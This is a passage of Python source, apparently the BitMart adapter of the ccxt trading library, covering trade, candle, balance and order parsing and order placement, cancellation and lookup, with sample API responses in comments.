'buys', 'sells', 'price', 'amount')\n elif market['swap'] or market['future']:\n return self.parse_order_book(data, symbol, None, 'buys', 'sells', 'price', 'vol')\n\n def parse_trade(self, trade, market=None):\n #\n # public fetchTrades spot( amount = count * price )\n #\n # {\n # \"amount\": \"818.94\",\n # \"order_time\": \"1637601839035\", # ETH/USDT\n # \"price\": \"4221.99\",\n # \"count\": \"0.19397\",\n # \"type\": \"buy\"\n # }\n #\n # public fetchTrades contract, private fetchMyTrades contract\n #\n # {\n # \"order_id\":109159616160,\n # \"trade_id\":109159616197,\n # \"contract_id\":2,\n # \"deal_price\":\"347.6\",\n # \"deal_vol\":\"5623\",\n # \"make_fee\":\"-5.8636644\",\n # \"take_fee\":\"9.772774\",\n # \"created_at\":\"2020-09-09T11:49:50.749170536Z\",\n # \"way\":1,\n # \"fluctuation\":\"0\"\n # }\n #\n # private fetchMyTrades spot\n #\n # {\n # \"detail_id\":256348632,\n # \"order_id\":2147484350,\n # \"symbol\":\"BTC_USDT\",\n # \"create_time\":1590462303000,\n # \"side\":\"buy\",\n # \"fees\":\"0.00001350\",\n # \"fee_coin_name\":\"BTC\",\n # \"notional\":\"88.00000000\",\n # \"price_avg\":\"8800.00\",\n # \"size\":\"0.01000\",\n # \"exec_type\":\"M\"\n # }\n #\n id = self.safe_string_2(trade, 'trade_id', 'detail_id')\n timestamp = self.safe_integer_2(trade, 'order_time', 'create_time')\n if timestamp is None:\n timestamp = self.safe_timestamp(trade, 's_t')\n if timestamp is None:\n timestamp = self.parse8601(self.safe_string(trade, 'created_at'))\n type = None\n way = self.safe_integer(trade, 'way')\n side = self.safe_string_lower_2(trade, 'type', 'side')\n if (side is None) and (way is not None):\n if way < 5:\n side = 'buy'\n else:\n side = 'sell'\n takerOrMaker = None\n execType = self.safe_string(trade, 'exec_type')\n if execType is not None:\n takerOrMaker = 'maker' if (execType == 'M') else 'taker'\n priceString = self.safe_string_2(trade, 'price', 'deal_price')\n priceString = self.safe_string(trade, 'price_avg', priceString)\n amountString = self.safe_string_2(trade, 'count', 'deal_vol')\n amountString = self.safe_string(trade, 'size', amountString)\n costString = self.safe_string_2(trade, 'amount', 'notional')\n orderId = self.safe_integer(trade, 'order_id')\n marketId = self.safe_string_2(trade, 'contract_id', 'symbol')\n symbol = self.safe_symbol(marketId, market, '_')\n feeCostString = self.safe_string(trade, 'fees')\n fee = None\n if feeCostString is not None:\n feeCurrencyId = self.safe_string(trade, 'fee_coin_name')\n feeCurrencyCode = self.safe_currency_code(feeCurrencyId)\n if (feeCurrencyCode is None) and (market is not None):\n feeCurrencyCode = market['base'] if (side == 'buy') else market['quote']\n fee = {\n 'cost': feeCostString,\n 'currency': feeCurrencyCode,\n }\n return self.safe_trade({\n 'info': trade,\n 'id': id,\n 'order': orderId,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'symbol': symbol,\n 'type': type,\n 'side': side,\n 'price': priceString,\n 'amount': amountString,\n 'cost': costString,\n 'takerOrMaker': takerOrMaker,\n 'fee': fee,\n }, market)\n\n def fetch_trades(self, symbol, since=None, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {\n 'symbol': market['id'],\n }\n method = None\n if market['spot']:\n request['symbol'] = market['id']\n method = 'publicSpotGetSymbolsTrades'\n elif market['swap'] or market['future']:\n method = 'publicContractGetTrades'\n request['contractID'] = market['id']\n response = getattr(self, method)(self.extend(request, params))\n #\n # 
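a minimal usage sketch(assumes import ccxt; the symbol and limit are illustrative):\n        #\n        #     exchange = ccxt.bitmart()\n        #     recent = exchange.fetch_trades('BTC/USDT', limit=10)  # each row is normalized by parse_trade() above\n        #\n        # 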
spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"222d74c0-8f6d-49d9-8e1b-98118c50eeba\",\n # \"data\":{\n # \"trades\":[\n # {\n # \"amount\":\"0.005703\",\n # \"order_time\":1599652045394,\n # \"price\":\"0.034029\",\n # \"count\":\"0.1676\",\n # \"type\":\"sell\"\n # },\n # ]\n # }\n # }\n #\n # contract\n #\n # {\n # \"errno\":\"OK\",\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"782bc746-b86e-43bf-8d1a-c68b479c9bdd\",\n # \"data\":{\n # \"trades\":[\n # {\n # \"order_id\":109159616160,\n # \"trade_id\":109159616197,\n # \"contract_id\":2,\n # \"deal_price\":\"347.6\",\n # \"deal_vol\":\"5623\",\n # \"make_fee\":\"-5.8636644\",\n # \"take_fee\":\"9.772774\",\n # \"created_at\":\"2020-09-09T11:49:50.749170536Z\",\n # \"way\":1,\n # \"fluctuation\":\"0\"\n # }\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n trades = self.safe_value(data, 'trades', [])\n return self.parse_trades(trades, market, since, limit)\n\n def parse_ohlcv(self, ohlcv, market=None):\n #\n # spot\n #\n # {\n # \"last_price\":\"0.034987\",\n # \"timestamp\":1598787420,\n # \"volume\":\"1.0198\",\n # \"open\":\"0.035007\",\n # \"close\":\"0.034987\",\n # \"high\":\"0.035007\",\n # \"low\":\"0.034986\"\n # }\n #\n # contract\n #\n # {\n # \"low\":\"404.4\",\n # \"high\":\"404.4\",\n # \"open\":\"404.4\",\n # \"close\":\"404.4\",\n # \"last_price\":\"404.4\",\n # \"avg_price\":\"404.4\",\n # \"volume\":\"7670\",\n # \"timestamp\":1598758441,\n # \"rise_fall_rate\":\"0\",\n # \"rise_fall_value\":\"0\",\n # \"base_coin_volume\":\"76.7\",\n # \"quote_coin_volume\":\"31017.48\"\n # }\n #\n # ws\n #\n # [\n # 1631056350, # timestamp\n # '46532.83', # oopen\n # '46555.71', # high\n # '46511.41', # low\n # '46555.71', # close\n # '0.25', # volume\n # ]\n #\n if isinstance(ohlcv, list):\n return [\n self.safe_timestamp(ohlcv, 0),\n self.safe_number(ohlcv, 1),\n self.safe_number(ohlcv, 2),\n self.safe_number(ohlcv, 3),\n self.safe_number(ohlcv, 4),\n self.safe_number(ohlcv, 5),\n ]\n else:\n return [\n self.safe_timestamp(ohlcv, 'timestamp'),\n self.safe_number(ohlcv, 'open'),\n self.safe_number(ohlcv, 'high'),\n self.safe_number(ohlcv, 'low'),\n self.safe_number(ohlcv, 'close'),\n self.safe_number(ohlcv, 'volume'),\n ]\n\n def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n type = market['type']\n method = None\n request = {}\n duration = self.parse_timeframe(timeframe)\n if type == 'spot':\n method = 'publicSpotGetSymbolsKline'\n request['symbol'] = market['id']\n request['step'] = self.timeframes[timeframe]\n # the exchange will return an empty array if more than 500 candles is requested\n maxLimit = 500\n if limit is None:\n limit = maxLimit\n limit = min(maxLimit, limit)\n if since is None:\n end = int(self.milliseconds() / 1000)\n start = end - limit * duration\n request['from'] = start\n request['to'] = end\n else:\n start = int(since / 1000)\n end = self.sum(start, limit * duration)\n request['from'] = start\n request['to'] = end\n elif (type == 'swap') or (type == 'future'):\n method = 'publicContractGetQuote'\n request['contractID'] = market['id']\n defaultLimit = 500\n if limit is None:\n limit = defaultLimit\n if since is None:\n end = int(self.milliseconds() / 1000)\n start = end - limit * duration\n request['startTime'] = start\n request['endTime'] = end\n else:\n start = int(since / 1000)\n end = self.sum(start, limit * duration)\n request['startTime'] = start\n 
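# illustrative arithmetic: timeframe '1m' gives duration = 60, so with the default limit of 500\n                # the requested window spans 500 * 60 = 30000 seconds(both bounds are epoch seconds)\n                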
request['endTime'] = end\n request['unit'] = self.timeframes[timeframe]\n request['resolution'] = 'M'\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"80d86378-ab4e-4c70-819e-b42146cf87ad\",\n # \"data\":{\n # \"klines\":[\n # {\"last_price\":\"0.034987\",\"timestamp\":1598787420,\"volume\":\"1.0198\",\"open\":\"0.035007\",\"close\":\"0.034987\",\"high\":\"0.035007\",\"low\":\"0.034986\"},\n # {\"last_price\":\"0.034986\",\"timestamp\":1598787480,\"volume\":\"0.3959\",\"open\":\"0.034982\",\"close\":\"0.034986\",\"high\":\"0.034986\",\"low\":\"0.034980\"},\n # {\"last_price\":\"0.034978\",\"timestamp\":1598787540,\"volume\":\"0.3259\",\"open\":\"0.034987\",\"close\":\"0.034978\",\"high\":\"0.034987\",\"low\":\"0.034977\"},\n # ]\n # }\n # }\n #\n # swap\n #\n # {\n # \"errno\":\"OK\",\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"32965074-5804-4655-b693-e953e36026a0\",\n # \"data\":[\n # {\"low\":\"404.4\",\"high\":\"404.4\",\"open\":\"404.4\",\"close\":\"404.4\",\"last_price\":\"404.4\",\"avg_price\":\"404.4\",\"volume\":\"7670\",\"timestamp\":1598758441,\"rise_fall_rate\":\"0\",\"rise_fall_value\":\"0\",\"base_coin_volume\":\"76.7\",\"quote_coin_volume\":\"31017.48\"},\n # {\"low\":\"404.1\",\"high\":\"404.4\",\"open\":\"404.4\",\"close\":\"404.1\",\"last_price\":\"404.1\",\"avg_price\":\"404.15881086\",\"volume\":\"12076\",\"timestamp\":1598758501,\"rise_fall_rate\":\"-0.000741839762611276\",\"rise_fall_value\":\"-0.3\",\"base_coin_volume\":\"120.76\",\"quote_coin_volume\":\"48806.2179994536\"},\n # {\"low\":\"404\",\"high\":\"404.3\",\"open\":\"404.1\",\"close\":\"404\",\"last_price\":\"404\",\"avg_price\":\"404.08918918\",\"volume\":\"740\",\"timestamp\":1598758561,\"rise_fall_rate\":\"-0.000247463499133878\",\"rise_fall_value\":\"-0.1\",\"base_coin_volume\":\"7.4\",\"quote_coin_volume\":\"2990.259999932\"},\n # ]\n # }\n #\n data = self.safe_value(response, 'data', {})\n if isinstance(data, list):\n return self.parse_ohlcvs(data, market, timeframe, since, limit)\n else:\n klines = self.safe_value(data, 'klines', [])\n return self.parse_ohlcvs(klines, market, timeframe, since, limit)\n\n def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n method = None\n request = {}\n if market['spot']:\n request['symbol'] = market['id']\n request['offset'] = 1 # max offset * limit < 500\n if limit is None:\n limit = 100 # max 100\n request['limit'] = limit\n method = 'privateSpotGetTrades'\n elif market['swap'] or market['future']:\n request['contractID'] = market['id']\n # request['offset'] = 1\n if limit is not None:\n request['size'] = limit # max 60\n method = 'privateContractGetUserTrades'\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"a06a5c53-8e6f-42d6-8082-2ff4718d221c\",\n # \"data\":{\n # \"current_page\":1,\n # \"trades\":[\n # {\n # \"detail_id\":256348632,\n # \"order_id\":2147484350,\n # \"symbol\":\"BTC_USDT\",\n # \"create_time\":1590462303000,\n # \"side\":\"buy\",\n # \"fees\":\"0.00001350\",\n # \"fee_coin_name\":\"BTC\",\n # \"notional\":\"88.00000000\",\n # \"price_avg\":\"8800.00\",\n # \"size\":\"0.01000\",\n # \"exec_type\":\"M\"\n # },\n # ]\n # }\n # }\n #\n # contract\n #\n # {\n # 
\"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"trades\": [\n # {\n # \"order_id\": 10116361,\n # \"trade_id\": 10116363,\n # \"contract_id\": 1,\n # \"deal_price\": \"16\",\n # \"deal_vol\": \"10\",\n # \"make_fee\": \"0.04\",\n # \"take_fee\": \"0.12\",\n # \"created_at\": null,\n # \"way\": 5,\n # \"fluctuation\": \"0\"\n # }\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n trades = self.safe_value(data, 'trades', [])\n return self.parse_trades(trades, market, since, limit)\n\n def fetch_order_trades(self, id, symbol=None, since=None, limit=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchOrderTrades() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n method = None\n request = {}\n if market['spot']:\n request['symbol'] = market['id']\n request['order_id'] = id\n method = 'privateSpotGetTrades'\n elif market['swap'] or market['future']:\n request['contractID'] = market['id']\n request['orderID'] = id\n method = 'privateContractGetOrderTrades'\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"a06a5c53-8e6f-42d6-8082-2ff4718d221c\",\n # \"data\":{\n # \"current_page\":1,\n # \"trades\":[\n # {\n # \"detail_id\":256348632,\n # \"order_id\":2147484350,\n # \"symbol\":\"BTC_USDT\",\n # \"create_time\":1590462303000,\n # \"side\":\"buy\",\n # \"fees\":\"0.00001350\",\n # \"fee_coin_name\":\"BTC\",\n # \"notional\":\"88.00000000\",\n # \"price_avg\":\"8800.00\",\n # \"size\":\"0.01000\",\n # \"exec_type\":\"M\"\n # },\n # ]\n # }\n # }\n #\n # contract\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"trades\": [\n # {\n # \"order_id\": 10116361,\n # \"trade_id\": 10116363,\n # \"contract_id\": 1,\n # \"deal_price\": \"16\",\n # \"deal_vol\": \"10\",\n # \"make_fee\": \"0.04\",\n # \"take_fee\": \"0.12\",\n # \"created_at\": null,\n # \"way\": 5,\n # \"fluctuation\": \"0\"\n # }\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n trades = self.safe_value(data, 'trades', [])\n return self.parse_trades(trades, market, since, limit)\n\n def fetch_balance(self, params={}):\n self.load_markets()\n method = None\n options = self.safe_value(self.options, 'fetchBalance', {})\n defaultType = self.safe_string(self.options, 'defaultType', 'spot')\n type = self.safe_string(options, 'type', defaultType)\n type = self.safe_string(params, 'type', type)\n params = self.omit(params, 'type')\n if type == 'spot':\n method = 'privateSpotGetWallet'\n elif type == 'account':\n method = 'privateAccountGetWallet'\n elif (type == 'swap') or (type == 'future') or (type == 'contract'):\n method = 'privateContractGetAccounts'\n response = getattr(self, method)(params)\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"39069916-72f9-44c7-acde-2ad5afd21cad\",\n # \"data\":{\n # \"wallet\":[\n # {\"id\":\"BTC\",\"name\":\"Bitcoin\",\"available\":\"0.00000062\",\"frozen\":\"0.00000000\"},\n # {\"id\":\"ETH\",\"name\":\"Ethereum\",\"available\":\"0.00002277\",\"frozen\":\"0.00000000\"},\n # {\"id\":\"BMX\",\"name\":\"BitMart Token\",\"available\":\"0.00000000\",\"frozen\":\"0.00000000\"}\n # ]\n # }\n # }\n #\n # account\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"5c3b7fc7-93b2-49ef-bb59-7fdc56915b59\",\n # 
\"data\":{\n # \"wallet\":[\n # {\"currency\":\"BTC\",\"name\":\"Bitcoin\",\"available\":\"0.00000062\",\"frozen\":\"0.00000000\"},\n # {\"currency\":\"ETH\",\"name\":\"Ethereum\",\"available\":\"0.00002277\",\"frozen\":\"0.00000000\"}\n # ]\n # }\n # }\n #\n # contract\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"accounts\": [\n # {\n # \"account_id\": 10,\n # \"coin_code\": \"USDT\",\n # \"freeze_vol\": \"1201.8\",\n # \"available_vol\": \"8397.65\",\n # \"cash_vol\": \"0\",\n # \"realised_vol\": \"-0.5\",\n # \"unrealised_vol\": \"-0.5\",\n # \"earnings_vol\": \"-0.5\",\n # \"created_at\": \"2018-07-13T16:48:49+08:00\",\n # \"updated_at\": \"2018-07-13T18:34:45.900387+08:00\"\n # }\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n wallet = self.safe_value_2(data, 'wallet', 'accounts', [])\n result = {'info': response}\n for i in range(0, len(wallet)):\n balance = wallet[i]\n currencyId = self.safe_string_2(balance, 'id', 'currency')\n currencyId = self.safe_string(balance, 'coin_code', currencyId)\n code = self.safe_currency_code(currencyId)\n account = self.account()\n account['free'] = self.safe_string_2(balance, 'available', 'available_vol')\n account['used'] = self.safe_string_2(balance, 'frozen', 'freeze_vol')\n result[code] = account\n return self.safe_balance(result)\n\n def parse_order(self, order, market=None):\n #\n # createOrder\n #\n # {\n # \"order_id\": 2707217580\n # }\n #\n # cancelOrder\n #\n # '2707217580' # order id\n #\n # spot fetchOrder, fetchOrdersByStatus, fetchOpenOrders, fetchClosedOrders\n #\n # {\n # \"order_id\":1736871726781,\n # \"symbol\":\"BTC_USDT\",\n # \"create_time\":1591096004000,\n # \"side\":\"sell\",\n # \"type\":\"market\",\n # \"price\":\"0.00\",\n # \"price_avg\":\"0.00\",\n # \"size\":\"0.02000\",\n # \"notional\":\"0.00000000\",\n # \"filled_notional\":\"0.00000000\",\n # \"filled_size\":\"0.00000\",\n # \"status\":\"8\"\n # }\n #\n # contract fetchOrder, fetchOrdersByStatus, fetchOpenOrders, fetchClosedOrders, fetchOrders\n #\n # {\n # \"order_id\": 10539098,\n # \"contract_id\": 1,\n # \"position_id\": 10539088,\n # \"account_id\": 10,\n # \"price\": \"16\",\n # \"vol\": \"1\",\n # \"done_avg_price\": \"16\",\n # \"done_vol\": \"1\",\n # \"way\": 3,\n # \"category\": 1,\n # \"open_type\": 2,\n # \"make_fee\": \"0.00025\",\n # \"take_fee\": \"0.012\",\n # \"origin\": \"\",\n # \"created_at\": \"2018-07-23T11:55:56.715305Z\",\n # \"finished_at\": \"2018-07-23T11:55:56.763941Z\",\n # \"status\": 4,\n # \"errno\": 0\n # }\n #\n id = None\n if isinstance(order, basestring):\n id = order\n order = {}\n id = self.safe_string(order, 'order_id', id)\n timestamp = self.parse8601(self.safe_string(order, 'created_at'))\n timestamp = self.safe_integer(order, 'create_time', timestamp)\n marketId = self.safe_string_2(order, 'symbol', 'contract_id')\n symbol = self.safe_symbol(marketId, market, '_')\n status = None\n if market is not None:\n status = self.parse_order_status_by_type(market['type'], self.safe_string(order, 'status'))\n amount = self.safe_string_2(order, 'size', 'vol')\n filled = self.safe_string_2(order, 'filled_size', 'done_vol')\n average = self.safe_string_2(order, 'price_avg', 'done_avg_price')\n price = self.safe_string(order, 'price')\n side = self.safe_string_2(order, 'way', 'side')\n # 1 = Open long\n # 2 = Close short\n # 3 = Close long\n # 4 = Open short\n category = self.safe_integer(order, 'category')\n type = 
self.safe_string(order, 'type')\n if category == 1:\n type = 'limit'\n elif category == 2:\n type = 'market'\n return self.safe_order2({\n 'id': id,\n 'clientOrderId': None,\n 'info': order,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'lastTradeTimestamp': None,\n 'symbol': symbol,\n 'type': type,\n 'timeInForce': None,\n 'postOnly': None,\n 'side': side,\n 'price': price,\n 'stopPrice': None,\n 'amount': amount,\n 'cost': None,\n 'average': average,\n 'filled': filled,\n 'remaining': None,\n 'status': status,\n 'fee': None,\n 'trades': None,\n }, market)\n\n def parse_order_status_by_type(self, type, status):\n statusesByType = {\n 'spot': {\n '1': 'failed', # Order failure\n '2': 'open', # Placing order\n '3': 'failed', # Order failure, Freeze failure\n '4': 'open', # Order success, Pending for fulfilment\n '5': 'open', # Partially filled\n '6': 'closed', # Fully filled\n '7': 'canceling', # Canceling\n '8': 'canceled', # Canceled\n },\n 'swap': {\n '1': 'open', # Submitting\n '2': 'open', # Commissioned\n '4': 'closed', # Completed\n },\n }\n statuses = self.safe_value(statusesByType, type, {})\n return self.safe_string(statuses, status, status)\n\n def create_order(self, symbol, type, side, amount, price=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = {}\n method = None\n if market['spot']:\n request['symbol'] = market['id']\n request['side'] = side\n request['type'] = type\n method = 'privateSpotPostSubmitOrder'\n if type == 'limit':\n request['size'] = self.amount_to_precision(symbol, amount)\n request['price'] = self.price_to_precision(symbol, price)\n elif type == 'market':\n # for market buy it requires the amount of quote currency to spend\n if side == 'buy':\n notional = self.safe_number(params, 'notional')\n createMarketBuyOrderRequiresPrice = self.safe_value(self.options, 'createMarketBuyOrderRequiresPrice', True)\n if createMarketBuyOrderRequiresPrice:\n if price is not None:\n if notional is None:\n notional = amount * price\n elif notional is None:\n raise InvalidOrder(self.id + \" createOrder() requires the price argument with market buy orders to calculate total order cost(amount to spend), where cost = amount * price. 
Supply a price argument to createOrder() call if you want the cost to be calculated for you from price and amount, or, alternatively, add .options['createMarketBuyOrderRequiresPrice'] = False and supply the total cost value in the 'amount' argument or in the 'notional' extra parameter(the exchange-specific behaviour)\")\n else:\n notional = amount if (notional is None) else notional\n precision = market['precision']['price']\n request['notional'] = self.decimal_to_precision(notional, TRUNCATE, precision, self.precisionMode)\n elif side == 'sell':\n request['size'] = self.amount_to_precision(symbol, amount)\n elif market['swap'] or market['future']:\n method = 'privateContractPostSubmitOrder'\n request['contractID'] = market['id']\n if type == 'limit':\n request['category'] = 1\n elif type == 'market':\n request['category'] = 2\n request['way'] = side # 1 = open long, 2 = close short, 3 = close long, 4 = open short\n request['custom_id'] = self.nonce()\n request['open_type'] = 1 # 1 = cross margin, 2 = fixed margin\n request['leverage'] = 1 # must meet the effective range of leverage configured in the contract\n request['price'] = self.price_to_precision(symbol, price)\n request['vol'] = self.amount_to_precision(symbol, amount)\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot and contract\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"order_id\": 2707217580\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n return self.parse_order(data, market)\n\n def cancel_order(self, id, symbol=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' cancelOrder() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n request = {}\n method = None\n if market['spot']:\n method = 'privateSpotPostCancelOrder'\n request['order_id'] = int(id)\n request['symbol'] = market['id']\n elif market['swap'] or market['future']:\n method = 'privateContractPostCancelOrders'\n request['contractID'] = market['id']\n request['orders'] = [int(id)]\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"result\": True\n # }\n # }\n #\n # spot alternative\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": True\n # }\n #\n # contract\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"succeed\": [\n # 2707219612\n # ],\n # \"failed\": []\n # }\n # }\n #\n data = self.safe_value(response, 'data')\n if data is True:\n return self.parse_order(id, market)\n succeeded = self.safe_value(data, 'succeed')\n if succeeded is not None:\n id = self.safe_string(succeeded, 0)\n if id is None:\n raise InvalidOrder(self.id + ' cancelOrder() failed to cancel ' + symbol + ' order id ' + id)\n else:\n result = self.safe_value(data, 'result')\n if not result:\n raise InvalidOrder(self.id + ' cancelOrder() ' + symbol + ' order id ' + id + ' is filled or canceled')\n order = self.parse_order(id, market)\n return self.extend(order, {'id': id})\n\n def cancel_all_orders(self, symbol=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' cancelAllOrders() requires a symbol argument')\n side = self.safe_string(params, 'side')\n if side is None:\n 
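# usage sketch(the symbol is illustrative): exchange.cancel_all_orders('BTC/USDT', {'side': 'buy'})\n            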
raise ArgumentsRequired(self.id + \" cancelAllOrders() requires a `side` parameter('buy' or 'sell')\")\n self.load_markets()\n market = self.market(symbol)\n if not market['spot']:\n raise NotSupported(self.id + ' cancelAllOrders() does not support ' + market['type'] + ' orders, only spot orders are accepted')\n request = {\n 'symbol': market['id'],\n 'side': side, # 'buy' or 'sell'\n }\n response = self.privateSpotPostCancelOrders(self.extend(request, params))\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {}\n # }\n #\n return response\n\n def cancel_orders(self, ids, symbol=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' canelOrders() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n if not market['spot']:\n raise NotSupported(self.id + ' cancelOrders() does not support ' + market['type'] + ' orders, only contract orders are accepted')\n orders = []\n for i in range(0, len(ids)):\n orders.append(int(ids[i]))\n request = {\n 'orders': orders,\n }\n response = self.privateContractPostCancelOrders(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"result\": True\n # }\n # }\n #\n # contract\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"succeed\": [\n # 2707219612\n # ],\n # \"failed\": []\n # }\n # }\n #\n return response\n\n def fetch_orders_by_status(self, status, symbol=None, since=None, limit=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchOrdersByStatus() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n request = {}\n method = None\n if market['spot']:\n method = 'privateSpotGetOrders'\n request['symbol'] = market['id']\n request['offset'] = 1 # max offset * limit < 500\n request['limit'] = 100 # max limit is 100\n # 1 = Order failure\n # 2 = Placing order\n # 3 = Order failure, Freeze failure\n # 4 = Order success, Pending for fulfilment\n # 5 = Partially filled\n # 6 = Fully filled\n # 7 = Canceling\n # 8 = Canceled\n # 9 = Outstanding(4 and 5)\n # 10 = 6 and 8\n if status == 'open':\n request['status'] = 9\n elif status == 'closed':\n request['status'] = 6\n elif status == 'canceled':\n request['status'] = 8\n else:\n request['status'] = status\n elif market['swap'] or market['future']:\n method = 'privateContractGetUserOrders'\n request['contractID'] = market['id']\n # request['offset'] = 1\n if limit is not None:\n request['size'] = limit # max 60\n # 0 = All\n # 1 = Submitting\n # 2 = Commissioned\n # 3 = 1 and 2\n # 4 = Completed\n if status == 'open':\n request['status'] = 3\n elif status == 'closed':\n request['status'] = 4\n else:\n request['status'] = status\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"70e7d427-7436-4fb8-8cdd-97e1f5eadbe9\",\n # \"data\":{\n # \"current_page\":1,\n # \"orders\":[\n # {\n # \"order_id\":2147601241,\n # \"symbol\":\"BTC_USDT\",\n # \"create_time\":1591099963000,\n # \"side\":\"sell\",\n # \"type\":\"limit\",\n # \"price\":\"9000.00\",\n # \"price_avg\":\"0.00\",\n # \"size\":\"1.00000\",\n # \"notional\":\"9000.00000000\",\n # \"filled_notional\":\"0.00000000\",\n # \"filled_size\":\"0.00000\",\n # \"status\":\"4\"\n # }\n # ]\n 
# }\n # }\n #\n # contract\n #\n # {\n # \"code\": 1000,\n # \"trace\":\"886fb6ae-456b-4654-b4e0-d681ac05cea1\",\n # \"message\": \"OK\",\n # \"data\": {\n # \"orders\": [\n # {\n # \"order_id\": 10284160,\n # \"contract_id\": 1,\n # \"price\": \"8\",\n # \"vol\": \"4\",\n # \"done_avg_price\": \"0\",\n # \"done_vol\": \"0\",\n # \"way\": 1,\n # \"category\": 1,\n # \"open_type\": 2,\n # \"make_fee\": \"0\",\n # \"take_fee\": \"0\",\n # \"origin\": \"\",\n # \"created_at\": \"2018-07-17T07:24:13.410507Z\",\n # \"finished_at\": null,\n # \"status\": 2,\n # \"errno\": 0\n # }\n # ]\n # }\n # }\n #\n data = self.safe_value(response, 'data', {})\n orders = self.safe_value(data, 'orders', [])\n return self.parse_orders(orders, market, since, limit)\n\n def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):\n return self.fetch_orders_by_status('open', symbol, since, limit, params)\n\n def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):\n return self.fetch_orders_by_status('closed', symbol, since, limit, params)\n\n def fetch_canceled_orders(self, symbol=None, since=None, limit=None, params={}):\n return self.fetch_orders_by_status('canceled', symbol, since, limit, params)\n\n def fetch_orders(self, symbol=None, since=None, limit=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchOrders() requires a symbol argument')\n self.load_markets()\n market = self.market(symbol)\n if not (market['swap'] or market['future']):\n raise NotSupported(self.id + ' fetchOrders does not support ' + market['type'] + ' markets, only contracts are supported')\n return self.fetch_orders_by_status(0, symbol, since, limit, params)\n\n def fetch_order(self, id, symbol=None, params={}):\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchOrder() requires a symbol argument')\n self.load_markets()\n request = {}\n market = self.market(symbol)\n method = None\n if not isinstance(id, basestring):\n id = str(id)\n if market['spot']:\n request['symbol'] = market['id']\n request['order_id'] = id\n method = 'privateSpotGetOrderDetail'\n elif market['swap'] or market['future']:\n request['contractID'] = market['id']\n request['orderID'] = id\n method = 'privateContractGetUserOrderInfo'\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # {\n # \"message\":\"OK\",\n # \"code\":1000,\n # \"trace\":\"a27c2cb5-ead4-471d-8455-1cfeda054ea6\",\n # \"data\": {\n # \"order_id\":1736871726781,\n # \"symbol\":\"BTC_USDT\",\n # \"create_time\":1591096004000,\n # \"side\":\"sell\",\n # 